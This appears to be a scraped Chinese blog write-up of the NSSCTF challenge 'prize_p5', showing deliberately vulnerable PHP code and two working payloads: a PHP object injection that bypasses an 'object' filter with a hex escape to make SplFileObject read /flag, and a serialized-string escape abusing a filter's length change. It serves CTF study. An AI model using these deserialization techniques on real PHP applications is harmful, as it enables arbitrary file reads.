当前位置:网站首页>NSSCTF prize_ p5
NSSCTF prize_ p5
2022-06-09 02:02:00 【I·CE】
Source code
<?php
error_reporting(0);
class catalogue{
public $class;
public $data;
public function __construct()
{
$this->class = "error";
$this->data = "hacker";
}
public function __destruct()
{
echo new $this->class($this->data);
}
}
class error{
public function __construct($OTL)
{
$this->OTL = $OTL;
echo ("hello ".$this->OTL);
}
}
class escape{
public $name = 'OTL';
public $phone = '123666';
public $email = '[email protected]';
}
function abscond($string) {
$filter = array('NSS', 'CTF', 'OTL_QAQ', 'hello');
$filter = '/' . implode('|', $filter) . '/i';
return preg_replace($filter, 'hacker', $string);
}
if(isset($_GET['cata'])){
if(!preg_match('/object/i',$_GET['cata'])){
unserialize($_GET['cata']);
}
else{
$cc = new catalogue();
unserialize(serialize($cc));
}
if(isset($_POST['name'])&&isset($_POST['phone'])&&isset($_POST['email'])){
if (preg_match("/flag/i",$_POST['email'])){
die("nonono,you can not do that!");
}
$abscond = new escape();
$abscond->name = $_POST['name'];
$abscond->phone = $_POST['phone'];
$abscond->email = $_POST['email'];
$abscond = serialize($abscond);
$escape = get_object_vars(unserialize(abscond($abscond)));
if(is_array($escape['phone'])){
echo base64_encode(file_get_contents($escape['email']));
}
else{
echo "I'm sorry to tell you that you are wrong";
}
}
}
else{
highlight_file(__FILE__);
}
?>
Class name can be used \ Hexadecimal characters Bypass
?cata=O:9:"catalogue":2:{s:5:"class";S:13:"SplFile\4fbject";s:4:"data";s:5:"/flag";}
String escape :
?cata=CTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFhellohello";s:5:"phone";a:1:{i:0;i:1;}s:5:"email";s:5:"/flag";}
ctf...hello Switch to hacker Less 53 A string , Add later , from "; From the beginning to the end } altogether 53 individual
边栏推荐
- Custom paging
- Suppress status error LNK1104 failed to open the file "boost_thread-vc142-mt-gd-x64-1\u 79.lib"
- C language warehouse cargo management system
- shell 评估文件/目录状态
- How to use superset to seamlessly connect with MRS for self-service analysis
- C语言校园超市管理系统
- Shell subtraction
- C language library management system
- C language student native place information record book
- Comment le modèle de diffusion a - t - il commencé à surpasser le Gan dans le domaine de la génération d'images?
猜你喜欢

iscc-2022

Official account mall system makes e-commerce easier!

Read the log + regularize and extract the desired content + write the script to csv/xlsx
![[MVC idea in unity -- using MVC to make UI logic]](/img/1b/7c07d68bb3491b69eb905f281216d8.png)
[MVC idea in unity -- using MVC to make UI logic]

662. maximum width of binary tree -bfs

谷歌chrome利用Bookmarks文件找回书签

Explain sentinel fusing strategy, degradation rules and flow control

前迪士尼高管称德普将回归《加勒比海盗》 继续演船长

Swift GCD DispatchGroup Notify wait DispatchSourceTimer Monitor system file Two apps communicate

【刷穿剑指】剑指 Offer II 003. 前 n 个数字二进制中 1 的个数
随机推荐
C language record book
How to improve the security of code -- ten skills of code defensive programming
Thread synchronization, process synchronization, mutex, semaphore, condition variable, etc
[1037. effective boomerang]
C language warehouse cargo management system
Shell move directory up
C language vaccine reservation management system
合约私有数据泄漏的安全问题分析及演示
马上消费:打击征信修复不遗余力,乱象根治呼唤社会合力
编写循环何条件任务
Shell loop for while (IV)
shell 颜色输出
根据经纬度计算距离
shell 天气预报
不容错过|额度管理与应用-银行信用卡行为评分篇(实操见)
大四学长谈程序员
浮點數詳解(一篇徹底學通浮點數)
双检锁为什么需要使用volatile关键字
Create house with UE4 brush BSP
shell CPU 使用率